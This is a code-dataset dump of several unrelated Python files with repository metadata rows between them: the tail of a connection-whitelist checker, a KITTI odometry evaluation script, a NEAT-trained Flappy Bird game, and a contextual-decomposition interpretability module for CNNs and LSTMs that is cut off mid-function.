protocol = port_data["protocol"]
port = port_data["port"]
if connection.is_equal_port(protocol, port):
check_result = Status.SUCCESS
break
executables = self.white_list["executables"]
for executable_data in executables:
executable = executable_data["executable"]
if connection.is_equal_executable(executable):
check_result = Status.SUCCESS
break
return check_result
def __check_connections_against_white_list(self, connections):
"""
Check list of connections against white list.
If all connections are listed into white list, the function
returns Status.SUCCESS overwise an error code will be returned.
:param connections: list of connections objects to be checked against
white list
:return: Status.SUCCESS
Status.BLACK_LISTED_CONNECTION
"""
self.logger.debug("***Checking connections against white list***")
blacklisted_connections = 0
for connection in connections:
self.logger.debug(
"Checking connection status: {}".format(connection)
)
connection_status = self.__check_connection_against_white_list(
connection
)
self.logger.debug(
"Connection status: {}".format(connection_status)
)
if connection_status != Status.SUCCESS:
blacklisted_connections += 1
self.logger.info(
"Connection {} is blacklisted".format(connection)
)
self.logger.info(
"Found {}/{} blacklisted connections".format(
blacklisted_connections, len(connections)
)
)
return (
Status.SUCCESS
if blacklisted_connections == 0
else Status.BLACK_LISTED_CONNECTION
)
def __get_list_of_active_connections(self):
"""
Get list of all active connections except loopback.
:return: List of active connections
"""
self.logger.debug("Get list of active connections")
active_connections = nsu.netstat()
return active_connections
| 33.84375
| 78
| 0.629732
| 3,931
| 0.907433
| 0
| 0
| 0
| 0
| 0
| 0
| 1,729
| 0.399123
|
77499e42f9ca78c74d1e6fe87f05359b0f2d3da1
| 1,036
|
py
|
Python
|
eval_odom.py
|
nikola3794/kitti-odom-eval
|
c808874dc18db3b60b8c711e55546f09af553659
|
[
"MIT"
] | 110
|
2019-10-21T02:41:57.000Z
|
2022-03-30T20:51:37.000Z
|
eval_odom.py
|
nikola3794/kitti-odom-eval
|
c808874dc18db3b60b8c711e55546f09af553659
|
[
"MIT"
] | 10
|
2020-01-02T09:42:45.000Z
|
2021-11-19T11:53:05.000Z
|
eval_odom.py
|
nikola3794/kitti-odom-eval
|
c808874dc18db3b60b8c711e55546f09af553659
|
[
"MIT"
] | 22
|
2019-11-18T07:40:18.000Z
|
2022-02-20T12:31:29.000Z
|
# Copyright (C) Huangying Zhan 2019. All rights reserved.
import argparse
from kitti_odometry import KittiEvalOdom
parser = argparse.ArgumentParser(description='KITTI evaluation')
parser.add_argument('--result', type=str, required=True,
help="Result directory")
parser.add_argument('--align', type=str,
choices=['scale', 'scale_7dof', '7dof', '6dof'],
default=None,
help="alignment type")
parser.add_argument('--seqs',
nargs="+",
type=int,
help="sequences to be evaluated",
default=None)
args = parser.parse_args()
eval_tool = KittiEvalOdom()
gt_dir = "dataset/kitti_odom/gt_poses/"
result_dir = args.result
continue_flag = input("Evaluate result in {}? [y/n]".format(result_dir))
if continue_flag == "y":
eval_tool.eval(
gt_dir,
result_dir,
alignment=args.align,
seqs=args.seqs,
)
else:
print("Double check the path!")
| 29.6
| 72
| 0.59556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 284
| 0.274131
|
7749a97981a9d33396783bf41834fff772524e60
| 9,115
|
py
|
Python
|
flappy_bird.py
|
wandreuscv/IA_learn_flappy_bird
|
46491f6336aba04af241b78edfd288f59d4b0aec
|
[
"MIT"
] | null | null | null |
flappy_bird.py
|
wandreuscv/IA_learn_flappy_bird
|
46491f6336aba04af241b78edfd288f59d4b0aec
|
[
"MIT"
] | null | null | null |
flappy_bird.py
|
wandreuscv/IA_learn_flappy_bird
|
46491f6336aba04af241b78edfd288f59d4b0aec
|
[
"MIT"
] | null | null | null |
import pygame
import random
import os
import time
import neat
import visualize
import pickle
import bcolors as b
pygame.font.init()
SCORE_MAX = [0, 0, 0]
WIN_WIDTH = 600
WIN_HEIGHT = 800
FLOOR = 730
STAT_FONT = pygame.font.SysFont("comicsans", 50)
END_FONT = pygame.font.SysFont("comicsans", 70)
DRAW_LINES = False
WIN = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))
pygame.display.set_caption("IA LEARNS Flappy Bird")
pipe_img = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","pipe.png")).convert_alpha())
bg_img = pygame.transform.scale(pygame.image.load(os.path.join("imgs","bg.png")).convert_alpha(), (600, 900))
bird_images = [pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","bird" + str(x) + ".png"))) for x in range(1,4)]
base_img = pygame.transform.scale2x(pygame.image.load(os.path.join("imgs","base.png")).convert_alpha())
gen = 0
class Bird:
MAX_ROTATION = 25
IMGS = bird_images
ROT_VEL = 20
ANIMATION_TIME = 5
def __init__(self, x, y):
self.x = x
self.y = y
self.tilt = 0
self.tick_count = 0
self.vel = 0
self.height = self.y
self.img_count = 0
self.img = self.IMGS[0]
def jump(self):
self.vel = -10
self.tick_count = 0
self.height = self.y
def move(self):
self.tick_count += 1
displacement = self.vel*(self.tick_count) + 0.5*(3)*(self.tick_count)**2
if displacement >= 16:
displacement = (displacement/abs(displacement)) * 16
if displacement < 0:
displacement -= 2
self.y = self.y + displacement
if displacement < 0 or self.y < self.height + 50:
if self.tilt < self.MAX_ROTATION:
self.tilt = self.MAX_ROTATION
else:
if self.tilt > -90:
self.tilt -= self.ROT_VEL
def draw(self, win):
self.img_count += 1
if self.img_count <= self.ANIMATION_TIME:
self.img = self.IMGS[0]
elif self.img_count <= self.ANIMATION_TIME*2:
self.img = self.IMGS[1]
elif self.img_count <= self.ANIMATION_TIME*3:
self.img = self.IMGS[2]
elif self.img_count <= self.ANIMATION_TIME*4:
self.img = self.IMGS[1]
elif self.img_count == self.ANIMATION_TIME*4 + 1:
self.img = self.IMGS[0]
self.img_count = 0
if self.tilt <= -80:
self.img = self.IMGS[1]
self.img_count = self.ANIMATION_TIME*2
blitRotateCenter(win, self.img, (self.x, self.y), self.tilt)
def get_mask(self):
return pygame.mask.from_surface(self.img)
class Pipe():
GAP = 200
VEL = 15
def __init__(self, x):
self.x = x
self.height = 0
self.top = 0
self.bottom = 0
self.PIPE_TOP = pygame.transform.flip(pipe_img, False, True)
self.PIPE_BOTTOM = pipe_img
self.passed = False
self.set_height()
def set_height(self):
self.height = random.randrange(50, 450)
self.top = self.height - self.PIPE_TOP.get_height()
self.bottom = self.height + self.GAP
def move(self):
self.x -= self.VEL
def draw(self, win):
win.blit(self.PIPE_TOP, (self.x, self.top))
win.blit(self.PIPE_BOTTOM, (self.x, self.bottom))
def collide(self, bird, win):
bird_mask = bird.get_mask()
top_mask = pygame.mask.from_surface(self.PIPE_TOP)
bottom_mask = pygame.mask.from_surface(self.PIPE_BOTTOM)
top_offset = (self.x - bird.x, self.top - round(bird.y))
bottom_offset = (self.x - bird.x, self.bottom - round(bird.y))
b_point = bird_mask.overlap(bottom_mask, bottom_offset)
t_point = bird_mask.overlap(top_mask,top_offset)
if b_point or t_point:
return True
return False
class Base:
VEL = 5
WIDTH = base_img.get_width()
IMG = base_img
def __init__(self, y):
self.y = y
self.x1 = 0
self.x2 = self.WIDTH
def move(self):
self.x1 -= self.VEL
self.x2 -= self.VEL
if self.x1 + self.WIDTH < 0:
self.x1 = self.x2 + self.WIDTH
if self.x2 + self.WIDTH < 0:
self.x2 = self.x1 + self.WIDTH
def draw(self, win):
win.blit(self.IMG, (self.x1, self.y))
win.blit(self.IMG, (self.x2, self.y))
def blitRotateCenter(surf, image, topleft, angle):
rotated_image = pygame.transform.rotate(image, angle)
new_rect = rotated_image.get_rect(center = image.get_rect(topleft = topleft).center)
surf.blit(rotated_image, new_rect.topleft)
def draw_window(win, birds, pipes, base, score, gen, pipe_ind):
if gen == 0:
gen = 1
win.blit(bg_img, (0,0))
for pipe in pipes:
pipe.draw(win)
base.draw(win)
for bird in birds:
if DRAW_LINES:
try:
pygame.draw.line(win, (255,0,0), (bird.x+bird.img.get_width()/2, bird.y + bird.img.get_height()/2), (pipes[pipe_ind].x + pipes[pipe_ind].PIPE_TOP.get_width()/2, pipes[pipe_ind].height), 5)
pygame.draw.line(win, (255,0,0), (bird.x+bird.img.get_width()/2, bird.y + bird.img.get_height()/2), (pipes[pipe_ind].x + pipes[pipe_ind].PIPE_BOTTOM.get_width()/2, pipes[pipe_ind].bottom), 5)
except:
pass
bird.draw(win)
score_label = STAT_FONT.render("Pontuação: " + str(score),1,(255,255,255))
win.blit(score_label, (WIN_WIDTH - score_label.get_width() - 15, 10))
score_label = STAT_FONT.render("Geração: " + str(gen-1),1,(255,255,255))
win.blit(score_label, (10, 10))
score_label = STAT_FONT.render("Restantes: " + str(len(birds)),1,(255,255,255))
win.blit(score_label, (10, 50))
pygame.display.update()
def eval_genomes(genomes, config):
global WIN, gen
win = WIN
gen += 1
nets = []
birds = []
ge = []
for genome_id, genome in genomes:
genome.fitness = 0
net = neat.nn.FeedForwardNetwork.create(genome, config)
nets.append(net)
birds.append(Bird(230,350))
ge.append(genome)
base = Base(FLOOR)
pipes = [Pipe(700)]
score = 0
clock = pygame.time.Clock()
run = True
while run and len(birds) > 0:
clock.tick(60)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
pygame.quit()
quit()
break
pipe_ind = 0
if len(birds) > 0:
if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_TOP.get_width():
pipe_ind = 1
for x, bird in enumerate(birds):
ge[x].fitness += 0.1
bird.move()
output = nets[birds.index(bird)].activate((bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom)))
if output[0] > 0.5:
bird.jump()
base.move()
rem = []
add_pipe = False
for pipe in pipes:
pipe.move()
for bird in birds:
if pipe.collide(bird, win):
ge[birds.index(bird)].fitness -= 1
nets.pop(birds.index(bird))
ge.pop(birds.index(bird))
birds.pop(birds.index(bird))
if pipe.x + pipe.PIPE_TOP.get_width() < 0:
rem.append(pipe)
if not pipe.passed and pipe.x < bird.x:
pipe.passed = True
add_pipe = True
if add_pipe:
score += 1
for genome in ge:
genome.fitness += 5
pipes.append(Pipe(WIN_WIDTH))
for r in rem:
pipes.remove(r)
for bird in birds:
if bird.y + bird.img.get_height() - 10 >= FLOOR or bird.y < -50:
nets.pop(birds.index(bird))
ge.pop(birds.index(bird))
birds.pop(birds.index(bird))
draw_window(WIN, birds, pipes, base, score, gen, pipe_ind)
if score > SCORE_MAX[0]:
SCORE_MAX[0] = score
SCORE_MAX[1] = gen - 1
SCORE_MAX[2] = genome.fitness
print(b.HELP, 'ACTUAL SCORE:', score, 'from generation:', gen, 'with fitness:', genome.fitness, b.END)
print(b.OKMSG, 'MAX SCORE FOR NOW:', SCORE_MAX[0], b.END, b.ERRMSG, 'by generation:', SCORE_MAX[1], b.END, b.BLUE, 'with fitness:', SCORE_MAX[2], b.END)
def run(config_file):
config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,
neat.DefaultSpeciesSet, neat.DefaultStagnation,
config_file)
p = neat.Population(config)
p.add_reporter(neat.StdOutReporter(True))
stats = neat.StatisticsReporter()
p.add_reporter(stats)
winner = p.run(eval_genomes, 50)
print('\nMelhor Genoma:\n{!s}'.format(winner))
if __name__ == '__main__':
local_dir = os.path.dirname(__file__)
config_path = os.path.join(local_dir, 'config-neat-flappybird.txt')
run(config_path)
| 28.844937
| 207
| 0.576961
| 3,536
| 0.387762
| 0
| 0
| 0
| 0
| 0
| 0
| 311
| 0.034105
|
774a3cbe3570598a07718acd612708e7b85dbeed
| 34,273
|
py
|
Python
|
src/cd.py
|
laura-rieger/deep-explanation-penalization
|
ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f
|
[
"MIT"
] | 105
|
2019-10-01T19:00:35.000Z
|
2022-03-25T14:03:32.000Z
|
src/cd.py
|
laura-rieger/deep-explanation-penalization
|
ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f
|
[
"MIT"
] | 11
|
2020-01-13T15:49:13.000Z
|
2021-12-28T11:36:21.000Z
|
src/cd.py
|
laura-rieger/deep-explanation-penalization
|
ac82aa4717b24e0ccf48ecbbf4c05d7e77a6d88f
|
[
"MIT"
] | 16
|
2019-12-22T20:53:33.000Z
|
2022-03-15T14:17:50.000Z
|
#original from https://github.com/csinva/hierarchical-dnn-interpretations/blob/master/acd/scores/cd.py
import torch
import torch.nn.functional as F
from copy import deepcopy
from torch import sigmoid
from torch import tanh
import numpy as np
stabilizing_constant = 10e-20
def propagate_three(a, b, c, activation):
a_contrib = 0.5 * (activation(a + c) - activation(c) + activation(a + b + c) - activation(b + c))
b_contrib = 0.5 * (activation(b + c) - activation(c) + activation(a + b + c) - activation(a + c))
return a_contrib, b_contrib, activation(c)
# propagate tanh nonlinearity
def propagate_tanh_two(a, b):
return 0.5 * (tanh(a) + (tanh(a + b) - tanh(b))), 0.5 * (tanh(b) + (tanh(a + b) - tanh(a)))
# propagate convolutional or linear layer
def propagate_conv_linear(relevant, irrelevant, module, device='cuda'):
bias = module(torch.zeros(irrelevant.size()).to(device))
rel = module(relevant) - bias
irrel = module(irrelevant) - bias
# elementwise proportional
prop_rel = torch.abs(rel)
prop_irrel = torch.abs(irrel)
prop_sum = prop_rel + prop_irrel +stabilizing_constant
prop_rel = torch.div(prop_rel, prop_sum)
prop_irrel = torch.div(prop_irrel, prop_sum)
return rel + torch.mul(prop_rel, bias), irrel + torch.mul(prop_irrel, bias)
def propagate_AdaptiveAvgPool2d(relevant, irrelevant, module, device='cuda'):
rel = module(relevant)
irrel = module(irrelevant)
return rel, irrel
# propagate ReLu nonlinearity
def propagate_relu(relevant, irrelevant, activation, device='cuda'):
swap_inplace = False
try: # handles inplace
if activation.inplace:
swap_inplace = True
activation.inplace = False
except:
pass
zeros = torch.zeros(relevant.size()).to(device)
rel_score = activation(relevant)
irrel_score = activation(relevant + irrelevant) - activation(relevant)
if swap_inplace:
activation.inplace = True
return rel_score, irrel_score
# propagate maxpooling operation
def propagate_pooling(relevant, irrelevant, pooler, model_type='mnist'):
if model_type == 'mnist':
unpool = torch.nn.MaxUnpool2d(kernel_size=2, stride=2)
avg_pooler = torch.nn.AvgPool2d(kernel_size=2, stride=2)
window_size = 4
elif model_type == 'vgg':
unpool = torch.nn.MaxUnpool2d(kernel_size=pooler.kernel_size, stride=pooler.stride)
avg_pooler = torch.nn.AvgPool2d(kernel_size=(pooler.kernel_size, pooler.kernel_size),
stride=(pooler.stride, pooler.stride), count_include_pad=False)
window_size = 4
# get both indices
p = deepcopy(pooler)
p.return_indices = True
both, both_ind = p(relevant + irrelevant)
ones_out = torch.ones_like(both)
size1 = relevant.size()
mask_both = unpool(ones_out, both_ind, output_size=size1)
# relevant
rel = mask_both * relevant
rel = avg_pooler(rel) * window_size
# irrelevant
irrel = mask_both * irrelevant
irrel = avg_pooler(irrel) * window_size
return rel, irrel
# propagate dropout operation
def propagate_dropout(relevant, irrelevant, dropout):
return dropout(relevant), dropout(irrelevant)
# get contextual decomposition scores for blob
def cd(blob, im_torch, model, model_type='mnist', device='cuda'):
# set up model
model.eval()
im_torch = im_torch.to(device)
# set up blobs
blob = torch.FloatTensor(blob).to(device)
relevant = blob * im_torch
irrelevant = (1 - blob) * im_torch
if model_type == 'mnist':
scores = []
mods = list(model.modules())[1:]
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[0])
relevant, irrelevant = propagate_pooling(relevant, irrelevant,
lambda x: F.max_pool2d(x, 2, return_indices=True), model_type='mnist')
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[1])
relevant, irrelevant = propagate_pooling(relevant, irrelevant,
lambda x: F.max_pool2d(x, 2, return_indices=True), model_type='mnist')
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant = relevant.view(-1, 800)
irrelevant = irrelevant.view(-1, 800)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[2])
relevant, irrelevant = propagate_relu(relevant, irrelevant, F.relu)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mods[3])
else:
mods = list(model.modules())
for i, mod in enumerate(mods):
t = str(type(mod))
if 'Conv2d' in t or 'Linear' in t:
if 'Linear' in t:
relevant = relevant.view(relevant.size(0), -1)
irrelevant = irrelevant.view(irrelevant.size(0), -1)
relevant, irrelevant = propagate_conv_linear(relevant, irrelevant, mod)
elif 'ReLU' in t:
relevant, irrelevant = propagate_relu(relevant, irrelevant, mod)
elif 'MaxPool2d' in t:
relevant, irrelevant = propagate_pooling(relevant, irrelevant, mod, model_type=model_type)
elif 'Dropout' in t:
relevant, irrelevant = propagate_dropout(relevant, irrelevant, mod)
return relevant, irrelevant
# batch of [start, stop) with unigrams working
def cd_batch_text(batch, model, start, stop, my_device = 0):
# rework for
weights = model.lstm
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights.weight_ih_l0, 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights.weight_hh_l0, 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights.bias_ih_l0 + weights.bias_hh_l0, 4)
word_vecs = torch.transpose(model.embed(batch.text).data, 1,2) #change: we take all
T = word_vecs.shape[0]
batch_size = word_vecs.shape[2]
relevant_h = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
irrelevant_h = torch.zeros((model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_rel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_irrel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
for i in range(T):
prev_rel_h = relevant_h
prev_irrel_h = irrelevant_h
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
if i >= start and i <= stop:
rel_i = rel_i +torch.matmul(W_ii, word_vecs[i])
rel_g = rel_g +torch.matmul(W_ig, word_vecs[i])
rel_f = rel_f +torch.matmul(W_if, word_vecs[i])
rel_o = rel_o +torch.matmul(W_io, word_vecs[i])
else:
irrel_i = irrel_i +torch.matmul(W_ii, word_vecs[i])
irrel_g = irrel_g +torch.matmul(W_ig, word_vecs[i])
irrel_f = irrel_f +torch.matmul(W_if, word_vecs[i])
irrel_o = irrel_o +torch.matmul(W_io, word_vecs[i])
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i[:,None], sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g[:,None], tanh)
relevant = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (rel_contrib_i + bias_contrib_i) * irrel_contrib_g
if i >= start and i < stop:
relevant =relevant + bias_contrib_i * bias_contrib_g
else:
irrelevant =irrelevant + bias_contrib_i * bias_contrib_g
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f[:,None], sigmoid)
relevant = relevant +(rel_contrib_f + bias_contrib_f) * prev_rel
irrelevant = irrelevant+(rel_contrib_f + irrel_contrib_f + bias_contrib_f) * prev_irrel + irrel_contrib_f * prev_rel
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o[:,None])
new_rel_h, new_irrel_h = propagate_tanh_two(relevant, irrelevant)
relevant_h = o * new_rel_h
irrelevant_h = o * new_irrel_h
prev_rel = relevant
prev_irrel = irrelevant
W_out = model.hidden_to_label.weight
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h)
irrel_scores = torch.matmul(W_out, irrelevant_h)
#tolerance = 0.001
#assert torch.sum(torch.abs((model.forward(batch) -model.hidden_to_label.bias.data) - (scores+irrel_scores))).cpu().detach().numpy() < tolerance
return scores, irrel_scores
def cd_text_irreg_scores(batch_text, model, start, stop, my_device = 0):
weights = model.lstm
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights.weight_ih_l0, 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights.weight_hh_l0, 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights.bias_ih_l0 + weights.bias_hh_l0, 4)
word_vecs = torch.transpose(model.embed(batch_text).data, 1,2) #change: we take all
T = word_vecs.shape[0]
batch_size = word_vecs.shape[2]
relevant_h = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
irrelevant_h = torch.zeros((model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_rel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
prev_irrel = torch.zeros(( model.hidden_dim,batch_size), device =torch.device(my_device), requires_grad=False)
for i in range(T):
prev_rel_h = relevant_h
prev_irrel_h = irrelevant_h
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
w_ii_contrib = torch.matmul(W_ii, word_vecs[i])
w_ig_contrib = torch.matmul(W_ig, word_vecs[i])
w_if_contrib = torch.matmul(W_if, word_vecs[i])
w_io_contrib = torch.matmul(W_io, word_vecs[i])
is_in_relevant = ((start <= i) * (i <= stop)).cuda().float()
is_not_in_relevant = 1 - is_in_relevant
rel_i = rel_i + is_in_relevant * w_ii_contrib
rel_g = rel_g + is_in_relevant * w_ig_contrib
rel_f = rel_f + is_in_relevant * w_if_contrib
rel_o = rel_o + is_in_relevant * w_io_contrib
irrel_i = irrel_i + is_not_in_relevant * w_ii_contrib
irrel_g = irrel_g + is_not_in_relevant * w_ig_contrib
irrel_f = irrel_f + is_not_in_relevant * w_if_contrib
irrel_o = irrel_o + is_not_in_relevant * w_io_contrib
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i[:,None], sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g[:,None], tanh)
relevant = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (rel_contrib_i + bias_contrib_i) * irrel_contrib_g
bias_contrib =bias_contrib_i * bias_contrib_g
is_in_relevant_bias = ((start <= i) * (i < stop)).cuda().float()
is_not_in_relevant_bias = 1- is_in_relevant_bias
relevant =relevant + is_in_relevant_bias*bias_contrib
irrelevant =irrelevant + is_not_in_relevant_bias*bias_contrib
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f[:,None], sigmoid)
relevant = relevant +(rel_contrib_f + bias_contrib_f) * prev_rel
irrelevant = irrelevant+(rel_contrib_f + irrel_contrib_f + bias_contrib_f) * prev_irrel + irrel_contrib_f * prev_rel
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o[:,None])
new_rel_h, new_irrel_h = propagate_tanh_two(relevant, irrelevant)
relevant_h = o * new_rel_h
irrelevant_h = o * new_irrel_h
prev_rel = relevant
prev_irrel = irrelevant
W_out = model.hidden_to_label.weight
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h)
irrel_scores = torch.matmul(W_out, irrelevant_h)
return scores, irrel_scores
def cd_text(batch, model, start, stop, batch_id = 0,my_device = 0):
# rework for
weights = model.lstm.state_dict()
# Index one = word vector (i) or hidden state (h), index two = gate
W_ii, W_if, W_ig, W_io = torch.chunk(weights['weight_ih_l0'], 4, 0)
W_hi, W_hf, W_hg, W_ho = torch.chunk(weights['weight_hh_l0'], 4, 0)
b_i, b_f, b_g, b_o = torch.chunk(weights['bias_ih_l0'] + weights['bias_hh_l0'], 4)
word_vecs = model.embed(batch.text)[:, batch_id].data
T = word_vecs.shape[0]
relevant = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
irrelevant = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
relevant_h = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
irrelevant_h = torch.zeros((T, model.hidden_dim), device =torch.device(my_device))
for i in range(T):
if i > 0:
prev_rel_h = relevant_h[i - 1]
prev_irrel_h = irrelevant_h[i - 1]
else:
prev_rel_h = torch.zeros(model.hidden_dim, device =torch.device(my_device))
prev_irrel_h = torch.zeros(model.hidden_dim, device =torch.device(my_device))
rel_i = torch.matmul(W_hi, prev_rel_h)
rel_g = torch.matmul(W_hg, prev_rel_h)
rel_f = torch.matmul(W_hf, prev_rel_h)
rel_o = torch.matmul(W_ho, prev_rel_h)
irrel_i = torch.matmul(W_hi, prev_irrel_h)
irrel_g = torch.matmul(W_hg, prev_irrel_h)
irrel_f = torch.matmul(W_hf, prev_irrel_h)
irrel_o = torch.matmul(W_ho, prev_irrel_h)
if start <= i <= stop:
rel_i = rel_i + torch.matmul(W_ii, word_vecs[i])
rel_g = rel_g + torch.matmul(W_ig, word_vecs[i])
rel_f = rel_f + torch.matmul(W_if, word_vecs[i])
rel_o = rel_o + torch.matmul(W_io, word_vecs[i])
else:
irrel_i = irrel_i + torch.matmul(W_ii, word_vecs[i])
irrel_g = irrel_g + torch.matmul(W_ig, word_vecs[i])
irrel_f = irrel_f + torch.matmul(W_if, word_vecs[i])
irrel_o = irrel_o + torch.matmul(W_io, word_vecs[i])
rel_contrib_i, irrel_contrib_i, bias_contrib_i = propagate_three(rel_i, irrel_i, b_i, sigmoid)
rel_contrib_g, irrel_contrib_g, bias_contrib_g = propagate_three(rel_g, irrel_g, b_g, tanh)
relevant[i] = rel_contrib_i * (rel_contrib_g + bias_contrib_g) + bias_contrib_i * rel_contrib_g
irrelevant[i] = irrel_contrib_i * (rel_contrib_g + irrel_contrib_g + bias_contrib_g) + (
rel_contrib_i + bias_contrib_i) * irrel_contrib_g
if start <= i <= stop:
relevant[i] += bias_contrib_i * bias_contrib_g
else:
irrelevant[i] += bias_contrib_i * bias_contrib_g
if i > 0:
rel_contrib_f, irrel_contrib_f, bias_contrib_f = propagate_three(rel_f, irrel_f, b_f, sigmoid)
relevant[i] += (rel_contrib_f + bias_contrib_f) * relevant[i - 1]
irrelevant[i] += (rel_contrib_f + irrel_contrib_f + bias_contrib_f) * irrelevant[i - 1] + irrel_contrib_f * \
relevant[i - 1]
o = sigmoid(torch.matmul(W_io, word_vecs[i]) + torch.matmul(W_ho, prev_rel_h + prev_irrel_h) + b_o)
#rel_contrib_o, irrel_contrib_o, bias_contrib_o = propagate_three(rel_o, irrel_o, b_o, sigmoid)
new_rel_h, new_irrel_h = propagate_tanh_two(relevant[i], irrelevant[i])
relevant_h[i] = o * new_rel_h
irrelevant_h[i] = o * new_irrel_h
W_out = model.hidden_to_label.weight.data
# Sanity check: scores + irrel_scores should equal the LSTM's output minus model.hidden_to_label.bias
scores = torch.matmul(W_out, relevant_h[T - 1])
irrel_scores = torch.matmul(W_out, irrelevant_h[T - 1])
tolerance = 0.001
assert torch.sum(torch.abs((model.forward(batch) -model.hidden_to_label.bias.data) - (scores+irrel_scores))).cpu().detach().numpy() < tolerance
return scores
def softmax_out(output):
return torch.nn.functional.softmax(torch.stack((output[0].reshape(-1),output[1].reshape(-1)), 1), dim = 1)
def is_in_relevant_toy(batch, start, stop, class_rules):
#XXX only for current model where relevant bigger five
rel_digits = ((batch.label ==0)[None, :] *(batch.text ==class_rules[0])) + (batch.label ==1)[None, :] *(batch.text ==class_rules[1])
relevant = rel_digits[start:stop].sum(dim=0)
irrelevant = rel_digits.sum(dim=0) - relevant
test_out = torch.cat((relevant[:, None], irrelevant[:, None]), 1)
return test_out
def cd_penalty_for_one_toy(batch, model1, start, stop,class_rules):
# get output
model1_output = cd_batch_text(batch, model1, start, stop)
# only use the correct class
correct_idx = (batch.label, torch.arange(batch.label.shape[0]))
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx]))
model2_softmax = is_in_relevant_toy(batch, start, stop,class_rules).cuda().float()
output = -(torch.log(model1_softmax)*model2_softmax).mean()
return output
def is_in_relevant_decoy(batch, start, stop, class_rules):
is_decoy = ((batch.label ==0) *(batch.text[start:stop] ==class_rules[0]) + (batch.label ==1) *(batch.text[start:stop] ==class_rules[1]))
return is_decoy.sum(dim=0)
def cd_penalty_for_one_decoy(batch, model1, start, stop,class_rules):
model1_output = cd_batch_text(batch, model1, start, stop)
correct_idx = (batch.label, torch.arange(batch.label.shape[0])) # only use the correct class
model1_softmax = softmax_out((model1_output[0][correct_idx],model1_output[1][correct_idx]))
mask_decoy_in_relevant = is_in_relevant_decoy(batch, start, stop,class_rules).cuda()
if mask_decoy_in_relevant.byte().any():
masked_relevant = model1_softmax[:,1].masked_select(mask_decoy_in_relevant.byte())
output = -(torch.log(masked_relevant)).mean()
return output
else:
return torch.zeros(1).cuda()
def cd_penalty_annotated(batch, model1, start, stop, scores):
# get index where annotation present:
idx_nonzero = (start != -1).nonzero()[:,0] # find the ones where annotation exists
